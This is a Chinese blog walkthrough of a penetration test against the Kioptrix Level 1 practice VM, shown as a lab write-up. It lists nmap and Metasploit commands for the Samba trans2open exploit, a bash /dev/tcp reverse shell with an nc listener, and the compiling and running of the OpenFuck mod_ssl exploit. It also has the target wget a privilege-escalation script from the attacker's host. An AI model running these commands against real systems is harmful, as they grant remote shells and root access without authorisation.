kioptrix-leva1靶场渗透测试

一.第一种方法

将vmx文件中靶机地址网络改为nat模式,然后用VMware打开vmx文件。

  1. kali linux 命令 ifconfig 查看本机ip

root@kali:~# ip add   (ifconfig有时候不管用)

  1. nmap进行c段扫描 nmap -sP 192.168.122.128/24

  

  1. 目标ip192.168.122.133

列出端口并进行端口服务探测 nmap -sV -A -p- -v 192.168.122.133

  1. Nmap扫描发现139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP) 采用了samba服务 
  2. 利用msf

(1):搜索smb扫描辅助模块 search smb_version 

(2):利用该模块

msf5 > use auxiliary/scanner/smb/smb_version   

msf5 auxiliary(scanner/smb/smb_version) >

msf5 auxiliary(scanner/smb/smb_version) > set rhost 192.168.122.133   //设置被攻击目标ip                                                                                                                                         

rhost => 192.168.122.133

msf5 auxiliary(scanner/smb/smb_version) > set rport 139  //设置端口

rport => 139

msf5 auxiliary(scanner/smb/smb_version) > run    //运行

(3):发现smb版本 Samba 2.2.1a

(4):Back 命令退出模块

msf5 > search samba   //搜索samba漏洞利用模块

   

  1. :利用漏洞脚本11  msf5 > use exploit/linux/samba/trans2open
  2. (6):显示payload并设置

msf5 exploit(linux/samba/trans2open) > show payload

[-] Invalid parameter "payload", use "show -h" for more information

msf5 exploit(linux/samba/trans2open) > show payloads

找到对应payload

(7):利用239就可以

msf5 exploit(linux/samba/trans2open) > set payloadset payload linux/x86/shell_reverse_tcp

payload => linux/x86/shell_reverse_tcp

(8):设置目标ip以及端口

msf5 exploit(linux/samba/trans2open) > set rhost 192.168.122.133

rhost => 192.168.122.133

msf5 exploit(linux/samba/trans2open) > set rport 139

rport => 139

(9):执行命令 run或者exploit

(10):反弹shell

(11):监听2333 端口 nc lvvp 2333

bash -i >& /dev/tcp/192.168.122.128/2333 0>&1 ip为kali主机ip

反弹shell成功

二.第二种方法

1.mod_ssl 版本低,可以利用

(1):搜索漏洞 searchsploit  mod_ssl/2.8.4

(2):下载脚本 47080.c

root@kali:~# locate unix/remote/47080.c

/usr/share/exploitdb/exploits/unix/remote/47080.c

(3):将脚本复制到桌面

cp /usr/share/exploitdb/exploits/unix/remote/47080.c ./

(4):编译脚本

root@kali:~# gcc -o exploit 47080.c -lcrypto

47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录

   21 | #include <openssl/ssl.h>

      |          ^~~~~~~~~~~~~~~

(5):提示报错了,经过百度搜索,发现是缺少了组件,咱们使用apt进行安装

root@kali:~#apt-get install libssl1.0-dev

然后再进行编译

root@kali:~# gcc -o OpenFuck 47080.c -lcrypto

(6):  ./OpenFuck 查看OpenFuck 使用方法

发现对应脚本

经测试0x6b可用

使用命令 ./OpenFuck 0x6b 192.168.122.133 -c 40

(7):拿到权限,但不是root权限

(8):错误显示缺少 ptrace-kmod.c  脚本

下载脚本

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

(9):之后kali主机开启http.Sever服务

python -m  SimpleHTTPServer 8000   //由于kali是python2,所以用户这个命令

                                                                                                                      

(10):目标机器下载脚本

wget 192.168.122.128:8000/ptrace-kmod.c

(11):之后重新编译脚本

./OpenFuck 0x6b 192.168.122.133 -c 40

(12):拿到权限

反弹shell

目标机 bash -i >& /dev/tcp/192.168.122.128/2333 0>&1   

Kali主机  监听 nc -lvvp 2333

                                                                                          

 成功拿到root权限。                                       

  • 25
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

viki101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值